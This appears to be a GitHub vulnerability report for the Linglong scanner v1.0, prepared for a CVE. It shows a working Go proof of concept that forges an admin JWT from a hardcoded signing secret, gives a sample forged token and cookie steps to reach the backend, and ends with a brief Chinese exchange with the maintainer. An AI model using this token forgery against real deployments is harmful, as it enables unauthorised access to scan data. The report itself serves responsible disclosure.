An invalid access control vulnerability was found

[binganao]

[Suggested description]

Attackers can directly construct the corresponding JWT authentication information and enter the background to view, add tasks and scan results

[Vulnerability Type]

Incorrect Access Control

[Vendor of Product]

https://github.com/awake1t/linglong/

[Affected Product Code Base]

v1.0

[Affected Component]

Use the following code to generate the corresponding JWT data

package main

import (
	"fmt"
	"github.com/dgrijalva/jwt-go"
	"time"
)

var jwtSecret = []byte("213123dd1")

type Claims struct {
	Username string `json:"username"`
	Password string `json:"password"`
	jwt.StandardClaims
}

func main()  {
	token, err := GenerateToken("linglong","bingan")

	if err != nil {
		fmt.Println("Linglong Token 生成失败")
	}

	fmt.Println("TOKEN: " + token)
	fmt.Println("HEADER: ")
	fmt.Println("Authorization: " + token)

}

func GenerateToken(username, password string) (string, error) {
	//fmt.Println("GenerateToken")
	nowTime := time.Now()
	expireTime := nowTime.Add(3 * time.Hour)

	claims := Claims{
		username,
		password,
		jwt.StandardClaims{
			ExpiresAt: expireTime.Unix(),
			Issuer:    "linglong",
		},
	}

	tokenClaims := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
	token, err := tokenClaims.SignedString(jwtSecret)

	return token, err
}

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imxpbmdsb25nIiwicGFzc3dvcmQiOiJxYXhzZWMiLCJleHAiOjE2NTAyNzYwOTAsImlzcyI6Imxpbmdsb25nIn0.jCiOvtQkXyQXsqzqWY8FdN7yiyTTj-piIo_aSKF3v6Q

Open Linglong site and write JWT data into the cookie

Open URL: /#/welcome You can enter the Lingling background

[Defective code]

/pkg/utils/jwt.go

[awake1t]

道理我都懂 好奇为什么师傅不用中文啊

[binganao]

道理我都懂 好奇为什么师傅不用中文啊

因为交CVE..

[awake1t]

哈哈哈 我猜也是 有cve编号了吗